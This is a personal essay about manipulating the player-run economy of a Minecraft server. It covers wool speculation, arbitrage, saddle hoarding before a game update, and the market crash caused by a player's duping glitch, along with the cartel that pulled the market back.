Quantcast
Channel: Hacker News
Viewing all 25817 articles
Browse latest View live

Economics of Minecraft

$
0
0

Those of us with the means to do as we pleased drove our vast resources into monumental construction. My grandest project was a Chinese city, tragically cut short by server reset. View from the north, inside the outer wall.

The first game I ever outsmarted was Final Fantasy 6. I was eight or nine. The rafting level after the Returners' hideout. You're shunted along on a rail, forced into a series of fights that culminate with a boss encounter. You have a temporary party member, Banon, with a zero-cost, group-target heal. The only status ailment the river enemies apply is Darkness, but as a consequence of an infamous bug with the game's evade mechanic, it does nothing. The river forks at two points, and the "wrong" choice at one of the forks sends the raft in a loop. There is a setting that makes the game preserve cursor positions for each character across battles.

I set everything up just right, placed a stack of quarters on the A button, turned off the television, and went to sleep.

I've always loved knowable systems. People are messy and complicated, but systems don't lie to you. Understand how all the parts work, understand how all the parts interact, and you can construct a perfect model of the whole thing in your head. Of course it's more complicated than that. Many people can be understood well enough for practical purposes as mechanical systems, and actual mechanical systems can be impossibly complex and plenty inscrutable. There are entire classes of software vulnerabilities that leverage physical properties of the hardware they run on, properties sufficiently abstracted away that most programmers have never in their lives considered them. But the thought is nice. I dreamed of going into constitutional law as a kid, back when I thought law was a perfect system, with outputs purely a function of inputs, that could be learned and trusted. I got fairly decent at interacting with people basically the same way you train a neural net, dumbly adjusting weights to minimize a loss function until I stumbled into something "good enough." I have to physically suppress the urge to hedge nearly everything I say with, "Well, it's way more complicated than this, but..."

So I know what I like, at least. Games scratched for a while this itch I have. Outright cheating always kind of bored me. Any asshole could plug in a Game Genie and look up codes online. (It had not occurred to me, as a child, that these "codes" were actually modifications to learnable systems themselves.) What I liked was playing within the confines of the rules, building an understanding of how the thing worked, then finding some leverage and exploiting the hell out of it. It's an interesting enough pursuit on its own, but all that gets cranked up an order of magnitude online. You're still just tinkering with systems. Watching how they function absent your influence, testing some inputs and observing the outputs, figuring things out, and taking control. But now you have marks, competition, and an audience. And just, like, people. People affect the system and become part of the system and make things so much more complex that the joy of figuring it all out is that much greater.

After sinking 10-20k hours into a single MMO and accomplishing a lot of unbelievable things within the confines of its gargantuan ruleset, it is generally pretty easy for me to pick up another game and figure out what makes it tick. I'll tell the story about that whole experience sometime, but it's a long tale to tell. This is about one of those other games: Minecraft.

Classical Chinese cityplanning divided the space of a city into nine congruant squares, numbered to sum to 15 in all directions. Everything was oriented on a north-south axis, with all important buildings facing south (here toward bottom-right.) The palace sat in the center, protected by its own wall with gatehouses and corner towers more ornate than those on the outer. The court sat in front of the sanctum, the market behind, the temple to the ancestors to the left, and temples to agriculture on the right. This all derives from the Rites of Zhou, and is presumed to be the exact layout of their first capital, Chengzhou, before the flight to Wangcheng.

The Players (names changed)

Alice
Ok this name wasn't changed.
Emma
Breathtaking builder with nigh-limitless cash reserves. Often called the queen of the server and earned the hell out of the title. She'd buy items at three times market just because she needed lots fast, and she bought so much her price became the price. And the builds she made with them were truly remarkable. Living legend.
Samantha
Before the currency was backed by experience points, she built the fastest mob grinder on the server and made an ungodly amount of money selling enchantments. Would quit for months, come back, and shake the economy up like no one else.
Victoria
Chief architect of an extensive rail network in the nether. Kept a finger on the pulse of the economy and bled it for all it was worth. Played the market like a harp. A lot of our best schemes were Victoria's schemes.

By the time of the Crash, we four were among the most influential people in the economy. By the end of the recovery from it, we owned the economy. The cartel we formed to pull the market back from the brink had about a half-dozen other significant players, and everyone contributed plenty, but for the most part the four of us called the shots and had the capital to back it up. When the server was wiped for biome update, we vaulted every hurdle, most of which were put in place specifically because of us, and reclaimed our riches in a matter of months.

Zel
Market maker. Known for the Emporium, a massive store near the marketplace proper that also bought everything it sold, a rare practice. Got rather wealthy off the spread on items; I almost single-handedly bankrupted them off the price differences between items. Also wrote our IRC bot, so for a time !alice triggered a lighthearted joke about my ruthlessness.
Lily
Kicked off the wool bubble. Did quite well for herself, as she was a producer rather than a speculator.
Charlotte
Discovered an item duping glitch and crashed the entire economy. Never shared the existence of the vuln or her exploit for it with a soul, as far as I know. Was obvious to me what she was doing, but only because I understood the economy well enough to know it was impossible any other way. If she'd switched to a burner account and laundered the money, she probably would have gotten away with it. Good kid. Hope she learns to program.
Jill, Frank
Just as lovely as everyone else, but for our purposes, "two wool speculators."

My main shop in the market, the last in a series of four locations, trading up each time.

Starting Out

Working a game's economy is an interesting pursuit because it, like most interesting pursuits, requires your whole brain to get really good at it. It's both analytical and creative: devise general theories with broad applicability, but retain a willingness to disregard or reevaluate those theories when something contradicts them. And it's fun as hell. There's not much quite like the brainfeel of starting with nothing, carving out a niche, getting a foothold, and snowballing. Game economies are all radically different because there aren't any limits on weird things the designers can do with the game, but they're all fundamentally similar too. Here are the tricks to breaking any of them, as basic as they may be:

  • Learn the game inside and out. You don't necessarily need to get good at it. I was a terrible player of my MMO for the first couple years I was involved in top-tier play. My primary role in my guild before I actually got good at the game itself was "in-house mechanics wonk," and it was an important role.) But you need to know what "good" is. It's hard to speculate on pork bellies without understanding why people care about pigs in the first place.
  • Read the patch notes and keep them in mind. Read the upcoming changes until you know them by heart. Actually think about how changes to the game will change the market. This is as overpowered as insider trading is in the real economy, except the information is all right there in public. Most players never do this, and you can make a killing in any game by hoarding the things that will be more valuable when the patch hits than they are right now. You would be amazed how fast "I'm so excited about [useless item becoming incredibly useful]!!" turns to "omg why is [suddenly useful item] so expensive :( :(" the moment the patch drops.
  • Study a tiny piece of the market. Don't touch it, just watch until you think you understand it. Make a small bet and see whether it pays off. Consider whether your hypothesis was right or whether you just got lucky. Slowly increase the size of your bets. Explore other tiny pieces. Think about how those pieces interact, how they are similar, how they differ. Manage your risk. Accrue capital so you can increase the size of your bets while decreasing your risk of ruin. It's a bit of art and a bit of science, but you can go from dabbling in a few niches to having a complete understanding of the entire market before you even know it.
  • Study people. Know your competition and know what makes them tick. Know the major buyers, know the tendencies of the swarms of anonymous buyers.
  • Overall just know a lot of things I guess.

I started on my server with only a rudimentary knowledge of the game itself and ipso facto zero understanding of its economy. Within six months or so, I had perhaps as detailed a mental model of it as one could get. I knew the price ranges of most of the items in the game and everything that all of them were used for. I knew how common they were on the market, who the major sellers were, what their supply chains looked like. I knew how fast they sold through, whether the price was stable or tacking a certain way, and I had tons of theories on ways to play all this to get what I needed and turn a profit while doing it, and nearly all of them were sound. Most of it I didn't even think about. I didn't need to contemplate why, for instance, lumber was both cheaper and more common than it should be, such that I could buy it all and hold, force the price up, corner the market, and keep it that way. I just kind of... knew, and did it. It's a wonderful feeling, weaving a system into your mind so tight that it's hard to find the stitches after awhile. Highly recommended.

Approaching the city from the north, outside the outer wall. In general I modelled the structures on the outer wall on the robust Song styles, with the inner more in the ornate Ming fashion. Terraced farms harvestable by water alongside large livestock pens provided all the food I needed.

Econ Infodump

Our server had an economy plugin called QuickShop. It added to the game a currency called marbles. Functionally marbles were nothing more than a number tied to your account. Marbles were backed by experience points, freely convertible in both directions by command. Experience points had intrinsic value because they were used for item enchantments, for instance to increase the mining speed of a tool or the damage of a weapon. Thus all the properties of a proper medium of exchange.

QuickShop also added, as one might expect, shops. Shops were chests with signs on them that bought or sold a designated item at a designated price. The moderators reserved a tract of land close to spawn as the official marketplace and leased a limited number of plots there to the public. There were many attempts by the playerbase to create competing unofficial markets, to varying degrees of success. The official market also had an official store, which sold certain items that were nearly impossible (cracked stone brick) or literally impossible (spawn eggs, sponge) to get otherwise. There was a plugin to lock chests, a plugin to remove randomness from the enchanting process, a plugin to bound the size of the world, a plugin to warp you between spawn, market, and your designated home. Other than that the server was vanilla survival non-PVP, no weird items or mobs. (In most cases I'm talking about 1.5 unless context implies 1.6/1.7.)

One marble was equal to two levels of experience. A diamond was generally 18-23M depending on the economy, and as they were extremely useful and their price could generally be relied on to stay in this range, diamonds were an excellent alternative store of value. Stone and dirt were 0.01M, the smallest you could subdivide a marble. In practice currency divisibility was never a source of friction; most resources were bought and sold by the stack (64 blocks) or chest (1728 blocks). Beacons were the most valuable item and ranged anywhere from 2000M to 8000M. Max enchant for an item cost 40-60 levels, ie 80-120M. Anyone who mined diamond without Fortune 3 was a fool, anyone who broke any blocks at all without Efficiency 5 Unbreaking 3 was a scrub. The server had over a few hundred to under a thousand weekly active players, maybe more than a thousand during summer months. Only the top ~1-3% were wealthy enough that we didn't have to mine unless we felt like it and were free to devote all our playing time to Great Works.

Virtual economies can be quite unlike real-world ones because the physical laws of the space are different, but analogies can be drawn, and the similarities and differences are both fascinating. Due to the warp mechanism, other than near public warp points like spawn and market, land was abundant and low-value--it mattered little whether you were 5000 or 50000 blocks from spawn if you could /home there from anywhere. Property rights were enforced by the admins. Claims worked something like homesteading in that you couldn't just stick a sign in the dirt, but if you worked the land, it was yours. Land could be owned communally, but tenants had no rights except to their movable property. ("Let's build a town together" sometimes worked well. "Hey join my town" never did.) Vandalism and theft were mostly eliminated by the LogBlock panopticon. With suspensions and permabans being the only analogs for physical coercion, the admins derived their monopoly on violence from the fundamental properties of the universe. They used their power very carefully, however, kept in check by the fact that there were zero barriers to exit beyond social ties and time investment. The internet births interesting societies.

One property of Minecraft itself is items can be grouped into the disjoint sets "renewable" and "nonrenewable". Nonrenewable resources are just that: a fixed number of them are created when the world is genned, no more will ever exist. Diamond is the big one, both mechanically crucial and totally nonrenewable, hence its excellence as a store of value. The only way to get them is to dig them out of the ground. This isn't a statement on effort or rarity--dirt is nonrenewable, for instance--just the fact that they cannot be created out of thin air.

Renewable resources can be created out of thin air. A subset of renewable resources can be farmed; a subset of farmable resources can be autofarmed. Some examples: redstone is technically renewable through villager trading or witch farming, but the cost of the former and the hassle of the latter makes it unfeasible, especially given how commonly it's encountered while diamond mining. Wheat is both renewable and farmable: plant seeds, harvest wheat, get more seeds from that, repeat. Harvesting can be automated with machines that run water over the fields and send the products into hoppers that feed chests. Replanting, however, requires a right click. Cactus is completely autofarmable: cacti grow to three blocks tall, cactus blocks break and drop the item if directly adjacent to another block, cacti grow irrespective of that fact. So you float blocks next to where they'd grow, flowing water underneath to channel the output into a hopper, cactus blocks accumulate forever with zero human intervention.

The important bit is with farmable resources, you double the size of your farm, you double your output but spend less than double the time each harvest. But the only way to get twice as much diamond is to dig twice as long. Logarithmic vs. linear growth. Autofarmable resources take time to accumulate but time spent harvesting is for practical purposes zero.

The properties of diamond make it in many ways the most crucial and interesting item in the game. But I'll get to that. First, a story about sheep.

Approach from the south, audience hall before the main entrance to the inner city. The guardian lions are arranged as is traditional. Male, on the left (from a south-facing perspective), its paw on a ball representing dominance over the world. Female, on the right, its paw on a cub representing nature.

All's Wool That Ends Wool

Sheep function kind of like wheat. You can breed an arbitrary number of them and efficiency increases on a curve, but shearing hundreds of sheep is at least as time-consuming as replanting hundreds of seeds, probably more so. Wool is a much more interesting resource, though. Sixteen different colors, and when building with wool, you generally need particular colors and you need them in bulk. White wool blocks can be dyed individually, but dye cost makes this infeasible for most colors in large batches. You can dye a sheep any color, however, and it will produce that color wool indefinitely.

Colored wool was notoriously hard to get on the market, and most just took this as a fact of life. People tended to grow their own food because it was relatively low-effort and cost nothing. So it was common to just keep a pen of sheep near the food, dye them when you needed a particular color, shear them over the course of days or weeks until you had enough wool for your build. Market rate for white wool was 0.08M, stable supply and decent demand, perfectly natural price. Colored wool, however...

  • You'd need sixteen shop chests rather than just the one, and floorspace in official market shops was valuable because they were size-limited by admin fiat.
  • Colored wool sales were virtually impossible to predict. You'd sell out of blue in an instant because someone happened to need blue. Maybe you restock and don't sell another block of blue for a month. So you had to stock everything all the time, meaning you had to have a lot of sheep.
  • You may be the only seller in the market, but you're competing against prospective buyers just doing it themselves. Since it was common knowledge that colored wool wasn't available on the market, people had already gotten used to doing it themselves, in part because...
  • Shearing sheep was fucking annoying. Shearing sixteen different pens of sheep for 0.08M a block when most of those blocks would languish most of the time was plain stupid. Sellers lost interest fast, so buyers got used to here-today-gone-tomorrow wool stores and adapted to there never being a reliable source.

What should have been obvious though was that because of all this, colored wool was simply more valuable. Plenty of demand, virtually no supply, who gives a shit about the price of white wool, right? People just assumed because the blocks were mechanically the same, they were worth the same.

Emma realized this and spread word on the grapevine that colored wool was an untapped market with massive profit potential. (I'm pretty sure she did it because she needed a lot of wool and was hoping for someone to do the work for her.) And whenever Emma said there was money to be made, everyone listened.

Lily was the first. She bred up hundreds and hundreds of sheep (so many that she had to cull the herd a bit because her FPS cratered whenever she looked at them) and by week's end there was a brand new wool store in the market with a full chest of every single color, plus a sign promising there'd always be more where that came from. She sold for 0.12M and business was good.

Really good, in fact. Even with the 50% increase, she sheared sheep for hours and could barely stay in stock of any color, despite the received wisdom that colored wool sold erratically. That's because another player, Jill, was buying out her entire inventory and reselling it across the street for 0.2M. And Jill didn't do too bad for herself either. Pretty soon wool went from a backchannel convo topic to the hottest game in town.

On the heels of Jill's success, Frank opened his own wool store. Not only did he sell for 0.35M, he bought via the same doublechest at 0.2M. Lily raised her price to compensate. Zel got in on the action with their own buy/sell doublechests, and everyone said business was booming. Prices kept climbing, and at the height of it, Zel was buying at 0.5M a block and selling for even more, while all the normals who just wanted a bit of wool here and there complained about the "crazy" market. Sorry guys, they were told, that's what wool is actually worth nowadays.

Except not quite. No one who wanted wool for consumption was actually paying those prices, it was all wool merchants buying each other out. I knew better than to get involved--it felt a lot like a bubble, so any investment at all carried unacceptable risk. Unless, of course, there was a way to get instant money with zero risk.

Wool, again, is renewable. It's farmable. Farming it is annoying, sure, but it's dead easy. While the price was climbing on speculation, a new seller nobody had heard of set up his own shop, without much fanfare, selling every color at 0.1M. He'd built his own farm, like they used to back in the olden days of less than a month ago. Jill and I were the only ones who even knew he existed, because every day when he logged in, we kept one eye on the server map. When we saw him warp to market, we raced to his shop to buy out anything he'd restocked. I imagine anyone else who noticed his store just figured it was always empty.

Jill used his wool to refill her chests. She did decent business. I took everything I bought, however, and immediately dumped it into Zel's buy chests. Quintuple what I paid, not a bad deal at all. As I started to fill their chests up, I sold anything else to Frank and a few other small-time buyers, the objective always being to unload what I bought within the hour. After awhile, "haha where are you getting all this wool from :P" turned to "no seriously alice where are you getting all this wool from." The bottom fell out of the market as the speculators shifted from "turn a profit" to "cut my losses" to "sell sell sell." Colored wool corrected to the nice sensible price of 0.12M and all was right with the world.

Through the audience hall, a courtyard before the gatehouse guarding the inner city.

"It's Your Money, and I Need It Now!"

Buy chests can be a real bitch. Emma, Victoria, and I used them extensively, but we used them right. Most people didn't use them. Most everyone else who did used them very, very wrong.

If you set a chest to buy an item at some price, it is possible for anyone at any time to sell you 1728 of that item. If you do this, you'd better be damn sure you want 1728 of that item. If you don't, you can pad out the chest with garbage to reduce its capacity. Set up a buy chest for say diamonds, put dirt blocks in 26 of the slots, now you can't be sold more than 64 diamonds. No one ever did this. I'm not sure it even occurred to most people that it was possible. One thing I got very, very used to seeing was the helpful message, "Failed to sell N items: player can only afford M."

As long as you knew what you were doing though, buy chests were beautiful tools.

Emma liked to buy materials for her builds for more than what people were selling. (Naturally, she first bought out every seller in the market.) Her prices were so good that people would spend hours a day doing the boring work for her. That's how I got my start, too--sold her maybe 15000 blocks of clay at 1M per over the course of a couple weeks. Enough capital to get me established, and within a month or two after that, playing the market made me enough cash that I didn't have to mine for anything.

Buying for less than market rate worked great too, if you didn't mind waiting. This is what I tended to do, both for things I needed and for things I turned around and sold at a markup. I rarely set up a buy chest that I didn't intend to keep open for months, and I adjusted my prices to change my burn rate rather than ever stop buying. It worked beautifully because over time people came to rely on my buy chests and could trust they weren't going away. I accumulated a group of regulars who sold to me because they knew I was always buying, and word of mouth drove more to me too. "Are ink sacs worth anything?" the newbie asks. "Yep, Alice buys those," says the good samaritan, who then brings them right to my door. Splendid.

Victoria did plenty of that kind of business too, but my favorite hustle of hers was her farm. She had on her land wheat fields, livestock pens, a tree farm, and various other such things. I mean, we all did, but she set up buy chests for all those goods right there at something like a quarter market rate. I was way the hell in the middle of nowhere, so it wouldn't have worked for me, but she also had the nether rail. "Take the white line to the third stop and you're right there!" And people would go work her fields, shear her sheep, chop down her trees, replant everything, and immediately sell her the goods at rock-bottom prices.

But that was us. Most people who set up buy chests, they were just begging for someone to take all their money. Few angles were more profitable or more reliable. No one was as good at it as me, in large part because I knew the entire market. Once or twice a day I'd stroll through the marketplace peeking in all the stores to see what changed. I didn't just know how much everything was worth, I knew every item every store bought and sold at what price and how much they had and how all those things had changed over time. To a reasonable degree of accuracy, anyway.

Imagine: p-queue of every chest, prioritized by item importance, "importance" being some heuristic incorporating overall supply/demand, whether I personally needed it, what kind of margin I could expect to make flipping it, whose store it was, what kind of foot traffic that store got, which market it was in... few other things I suppose, it wasn't a system so much as a feeling. First few hundred chests in the queue I flat-out memorized. Next thousand or so I knew which store what item and around how much. All the rest I knew there was a store in a general area that bought or sold the item at a good bad or ok price. By "all the rest" I mean all. At the height of it there was Market East, Market West, Market 2 (don't ask), Zel's Emporium, The Mall, and a couple dozen minor destinations in distant locales most players didn't even know about. Ballpark 16 chests/shop * 16 shops/row * 4 rows/market * 3 markets + Zel ~= 3200 chests and a couple thousand more in the hinterlands.

Most of the people in the top tier I knew their stores better than they did. It wasn't uncommon, for instance, for Zel to tell someone in chat, "I sell X item for P marbles," only for me to interject, "You sell X for Q but you've been out of stock for a week. Market East, second left, third shop on the right sells for R." One time I caught someone who had been using a hopper to siphon emeralds out of one of Victoria's shop chests. I didn't witness it or anything, I just noticed her supply had steadily dropped over the course of a week at a rate that was highly unusual given how the emerald market normally flowed. Summoned a mod to check the history of the blocks underneath, and my suspicions were confirmed. Victoria hadn't realized anything was even missing.

(A little while later someone scooped a beacon from me in the same manner; I'd since learned who did Victoria's shop, so I private messaged the likely culprit with a few choice words. They apologized profusely, swore to mend their ways... and a few hours later hoppered three beacons back to replace the one they took. A happy ending for all involved, I'd say. After this I replaced the blocks underneath my chests with locked furnaces.)

Anyway. It's easy to cash out on buy chests when you know every shop on the server. And no one had more buy chests than Zel.

The largest structure in the inner city, a palace meant for reception of honored guests and scholar-officials. Similar in layout to a traditional siheyuan, though on a much grander scale. The front structure was more open to vistors (though of course access to the inner city was strictly controlled) while the ruler's living quarters were tucked behind. All in all I didn't leave myself enough space to do a full complex. If I were to do it again, I'd make the city much larger and worry less about leveling terrain (which ended up taking an incredible amount of time).

Ethics in Video Game Commercialism

Zel's Emporium was truly a wonderland. Three stories, couple hundred chests, and every item they sold, they also bought. From the same chest. In theory, the arbitrage business is a good one: set up your shops, keep an eye on the prices, collect free money off the spread with very little effort. The Emporium's stock was so diverse that it did plenty of business in both directions, and Zel had enough cash reserves to bounce back from most setbacks.

Well, most. Let me tell you about lilypads. Lilypads gen on water in swamp biomes. Very common and fairly easy to gather but don't have much use besides decoration. People who wanted them usually just needed a handful to decorate a pond or two, people building in swamps only ever harvested them incidental to other activities, and most people didn't like to build in swamps anyway. Lilypads were garbage. Zel, being the long tail merchant that they were, sold them for 5M. Overpriced relative to their commonness in the world, but fine considering their scarcity in the market. One of their hundreds of tiny rivlets of income.

Zel bought lilypads for 3M. This was easily one of the most absurd prices I had ever seen on the server for anything and I spent days stripping swamp biome after swamp biome for the things just to take advantage of it. I emerged from the swamps and with no warning sold Zel around 3500 lilypads for just over 10000M. Zel later told me they knew the price was high but never in a million years thought anyone would be insane enough to do what I did.

It sounds like I picked on Zel a lot. I really did like them and felt bad about abusing their store so much. Not bad enough not to do it though. Managing a couple hundred chests is hard as hell, and market conditions shifted prices faster than they could keep up. It became almost routine that I'd find something in the market Zel bought for more than the seller sold, buy it out, warp over, free money.

Eventually, to my shock, I completely tapped them out. I didn't think it could be done--that they were always able to buy anything was the defining feature of the store, and their reserves seemed deep enough that I never thought I'd drain them. They widened their spreads even further, dropped their sale prices a bit, and tried to recoup. They still had huge stores of goods, so it's not like they were flat on their ass. They brought in a partner and revamped things a bit, and I even sent letters from time to time when they got a price so egregiously wrong that I felt it would be dishonorable to exploit.

Obviously though, the game was up. I couldn't sell them anything if they had no money.

...so I started running back-to-back transactions where I'd buy just enough of their valuable items to give them the precise number of marbles that I planned to reclaim by selling them junk. All's fair, y'know.

The upstairs of my shop. After a few weeks gathering for Emma to get myself established, I started keeping clay for myself. By time 1.6 came I had five or six doublechests and solid stocks of or supplychains for every dye. I was the only seller and did pretty well.

Clays 'n Saddles

I don't think I can stress this enough: even if you suck at playing the market, even if you don't have much time to invest into the game, you can blow any virtual economy wide open just by reading the upcoming changes, predicting how those changes will shift supply/demand curves, and investing in items based on those predictions. Huge, complicated MMOs, it can often be hard to make accurate predictions without an encyclopedic knowledge of game mechanics. Often it's pretty simple though. People want cool shit.

Minecraft 1.6 was colloquially known as The Horse Update. It added such things as:

  • Horses
  • Hardened clay
  • Coal blocks
  • Stained clay
  • Carpets

It was a popular topic of conversation on our 1.5 server for some time; we always got updates several months late since we needed to wait for Bukkit and our core plugins to update. (I'm not sure if things have changed since, but back then, every Minecraft update was a breaking one. Modders had to dump the jars every release and work from the decompiled artifacts directly. It is a testament to how enjoyable a game Minecraft is to play that it even has a mod community at all.) Here are all the new 1.6 features people on our server talked about:

  • Horses
  • Horses
  • Omg horses
  • Guys I can't wait for horses
  • Horses!!!!

To ride a horse you need a saddle. Prior to 1.6, saddles could only be used to ride pigs, and pigs are terrible mounts, so no one used them. Several shops stocked saddles at 20-30M. Some people sold for more, since saddles were uncraftable and pretty rare, but no one ever paid that much. For about a month leading up to 1.6, I bought any saddle I could find under 60M. In theory most players would only need one or two of the things, so I didn't want to spend absurd amounts on them. I ended up with several dozen, figured they'd go up to maybe 80-90M and I'd turn a decent profit.

Then 1.6 hit and people absolutely lost their minds. Turns out, only a minority of players so excited about the horses had made sure to get ahold of a saddle in preparation for the patch. Most all of them just assumed they could buy a saddle on patch day so why bother getting one early. Several rich players had stockpiled plenty but had zero intention of selling them. Every saddle in the market vanished within a matter of hours: 80M, 120M, 150M, it didn't matter, and after they were all gone, there was much wailing and gnashing of teeth. I knew the price would rise, but I didn't think it would rise that high. You can usually get a saddle or two from a solid day of dungeon crawling. But no one wanted to go explore boring old dungeons. They wanted to ride horses, dammit.

I placed a chest in the center of my main store, atop a nice little diamond block pedestal, selling one saddle, for 750M. Most people laughed at the price, some cursed my greed, plenty sent me private messages trying to haggle or find out if I had more. A few hours later, it sold. I let the chest sit empty until word got around, then put another saddle in it.

All told I moved ten or twelve at 500-750M apiece, average profit per around 1000-2000%. The pricepoint proved unsustainable, but because of a rather mysterious supplier (which I will get to soon) I had a steady stream of saddles that I could sell quite briskly at a modest markup. People were starting to pour hours into extracting the things from dungeons too, hoping to cash in on market conditions they didn't realize had already evaporated. But I managed to outsell them anyway, even as they tried to compete on price, because I had something they didn't: horses.

My horse farm. I considered at one point digging out a space underneath to build a track on which to clock their run speeds. Never ended up doing it, though, because aside from Emma, no one actually cared how fast the horses were.

Horse of a Different Color

Normally, horses spawn naturally in grasslands, just like any other animal. But because we were on an old world, or because of a bug in some plugin we used, they didn't. So the admins sold horse eggs for 150M, single-use items normally unobtainable in survival that spawned a horse (90%) or donkey (10%). Horses came in seven colors and five patterns for a total of 35 different appearances, and people had strong opinions about which one they wanted. Average players could afford one or two, but with such a low chance of getting what they wanted, many found themselves disappointed or else didn't even bother.

I scouted out locations close to spawn (a difficult task given how overdeveloped the land was), eventually discovering a small mountain someone had built their home atop who probably wouldn't notice or mind that overnight I'd hollowed it out and stuck a couple doors on the side. Set up pens with fences in my cavern under the mountain, bought fifteen or so eggs, popped them all and started breeding the output. Breeding took an item of negligible cost given to each horse and produced a foal with close to a 50-50 chance of inheriting one of the parents' colors and one of their patterns, with a very small chance of getting a random one instead. There's a cooldown of some minutes before they can be bred again. Foals can be raised into adults instantly by spamming them with wheat. It took a few days of cross-breeding and culling, but eventually I had 70 horses, two of each combination, separated into seven pens by color, along with a handful of donkeys and mules.

I sold horses for 100M, two-thirds the price of an egg, but unlike the crapshoot that was, I could offer any style the buyer wanted, no risk and no wait. (And at zero marginal cost.) Buy a saddle with the horse and get an extra discount. This proved to be a nice side business for some time.

My warehouse, in the basement of the palace. The view from the opposite corner is much the same. Some of the ladders descend to more stacks of doublechests underneath. Organizing and labeling all of this is probably one of the most autistic things I've ever done. Though I'm pretty sure everything in this post qualifies.

She Went to Jared

Or, How I Learned to Stop Worrying and Love Catastrophic Economic Meltdown

So an interesting thing happened during the whole saddle episode. As I became well-known for having the only consistently available, if rather pricey, stock of the item, a player Charlotte messaged me asking if I'd like to buy more. They were selling rather briskly now, I was starting to run low, and especially since I was planning on getting into the horse business too, I needed a steady supplier. She'd sell me six or seven at a time for 50 or 60M, saying that was all she had, but whenever I went back, she had more. A bit strange but nothing too out of the ordinary. She had a few orbiters, so I figured maybe they were working together to excavate the things. Anyway, it was good for me.

Then she opened her store in the far corner of the market. It was truly insane. Diamonds for 6M, when I sold for 20M and Emma for 23M. Emeralds for 5M, gold blocks for 3M. Wither skulls for 120M--three makes a beacon, and beacons sold for thousands when they could be got at all. Enormous quantities of everything, no one could have harvested all this if they spent years, and Charlotte was nowhere near a savvy enough player to have acquired it through the economy. And if she was, she wouldn't have been selling for those prices anyway.

I went to one of the admins and told her someone had discovered a dupe glitch. She told me this was impossible. I explained the evidence, that it was the only likely explanation, that I didn't think anyone should be punished necessarily, but it should at least be corrected and the items deleted. She continued to insist that there was no way this could possibly happen. (She was a programmer herself, and as such probably should have known better.) Wary of being tagged an accomplice then, I asked if it should turn out that these items were in fact duped, would I be punished for trading in them. She assured me that no one would be banned for buying and selling in good faith.

So I went to work.

Diamonds being not the most valuable but certainly the most valued item in the game, both for their utility and their price stability, the server was littered with buy chests for them. These were mostly of the fling and a prayer sort, offering prices low enough that anyone selling to them was a noob or a fool. But not so low that I couldn't sell them Charlotte's. I bought from her all I could afford, bankrupted every single person who had a buy chest at any price, then went back for more. Buy chests in the market shops, scattered on the roadsides, nestled in secluded towns no one remembered the names of, I hit them all. If you were buying diamonds at the bottom of the ocean, I would find you and take all of your money.

At the same time, I dropped my sell price in the market to 16M and did pretty good business for a few weeks. I had the advantage of one of the two best plots there were, the other belonging to Emma. (This I'd gotten via inside knowledge that Zel's to-be partner was shuttering his store and gifting the plot to a friend. I offered to swap my plot as the gift, help with the deconstruction process, and advise on pricing in the Emporium in exchange, thus getting the prized location without it ever going up for sale.) QuickShop provided a console command to show the closest shop selling an item, and these two plots, though behind hedge walls and not immediately visible, were the closest as the crow flies to the market's warp-in point. So anyone using the command--and this was most people, traipsing through the market looking for deals being a rare activity mostly limited to speculators--got directed to me or Emma for anything either of us sold.

This all made me a lot of money. I drove a portion of profits into bolstering my diamond and beacon reserves, bought basically any building material I thought I'd ever need in bulk, and still watched my marble balance grow. Up til the diamond bonanza, I'd been making money on a dozen different side hustles. A bit here, a bit there, doing better than most, but regardless the day-in day-out of working the market took up the majority of my time on the game. That made me rich; this is what made me wealthy.

But soon 16M became 14M, and 14M became 12M. A few people started to notice Charlotte's store, and she restocked faster than I, or anyone, could recoup enough to buy out. Mostly though, it was clear to everyone the price of diamond was falling, even if they had no idea why. I diversified into selling enchanted diamond equipment of all types, priced just so that I could break even on the enchant and move the component diamonds at the same price I sold them for raw. A few of the buy chest people I'd tanked tried recovering some of their money by putting up at a loss the diamonds I'd sold them, but they still couldn't move product faster than a trickle. Eventually even Charlotte had to cut her prices to keep selling. It was bad.

Not long after, the admin I'd spoken to before came back to me saying she discovered the dupe glitch, Charlotte was tempbanned and her items revoked, and it would be greatly appreciated if I could please turn over any diamonds I got from her that I had left in exchange for the price I'd paid so they may be destroyed. Of course I agreed. I'd made out like a bandit already, and at that point, like poor old JP Morgan during the Panic of 1907, was more concerned with the state of the economy as a whole, that left uncorrected it might render everything I now held worthless. (I did however neglect to mention the wither skulls.) I could not resist telling her I told her so.

But the damage was done. The only reason you couldn't say the economy was in freefall was because all that remained was a stain on the ground. Many players who'd harvested and traded only did so to reduce the time they spent mining for diamond, and the game's equivalent of middle-class affluence was steady access to diamond tools. At first the abundance of diamond must have seemed like a boon to people who long had to struggle to get enough to sustain their needs. But mining diamonds to sell was also the primary way most knew to make money with which to buy building materials, thus the purchasing power of the vast majority plummeted alongside its price. (Diamonds are rare in the ground and as such have a Skinner box sort of reward-feedback loop when uncovered, which makes them for many players the most enjoyable thing to farm. The things I did to make my first tens of thousands--digging clay out of riverbeds, gathering lilypads from swamps--were more lucrative but less exciting, and as such I was the only one who did them.)

In this way, diamond was the linchpin of the entire system, so when its price bottomed out, everything else went with it. Nothing you could gather and sell was worth the money you'd get for it. And even if it was, nothing you'd want to buy with that money was available for purchase. Everyone on the server was reduced to subsistence, forced to harvest everything they might need. Even those of us with real money, once our stockpiles of raw materials started to dwindle, had to dig more out the dirt like a bunch of scrubs. The entire market was as illiquid as a Weichselian glacier.

And then Samantha came back.

Temple to the ancestors, just east of the inner city.

Gonna Buy With a Little Help From My Friends

Samantha, naturally, was horrified by the state of affairs upon her return. I mean, we all were. We thought the problem was just too massive to manage on our own, that the only thing we could do was keep playing the game and hope it worked itself out over time. Samantha didn't.

Aside from our vast reserves of raw goods, Emma and I each had several hundred thousand marbles, Victoria a bit less, Samantha a bit more. Samantha intimated to us that she intended to spend her entire fortune clearing the market of diamond and that we should join her in this endeavor. What she understood immediately, which we were initially wary to gamble on, was that while it seemed like there was more diamond out there than anyone could buy, much of it was already in plain view. No one but us was holding onto serious reserves, not like us, so all we had to do was shoulder the initial investment. We could swoop in and acquire all that there was to be had before anyone knew what was happening. They'd dump what they held once they saw there were buyers again, seeing it as a rare opportunity, not understanding our aim was to push the price past what we were paying. Then we'd become the primary suppliers for the server and quickly start making our money back, which we could then use to force up the prices of everything else. Anyway, the worst that could happen is we'd end up with too much of the most useful item in the game.

We set up a private group on a messaging app and invited a half dozen or so other people. Zel, Lily, people with some amount of assets who we knew worked the market strategically and had a vested interest in dragging it back from the brink. Minor players by comparison to us four, but it was good to have everyone on the same page. Diamond was still in the 6M range; we decided the new price would be 18M.

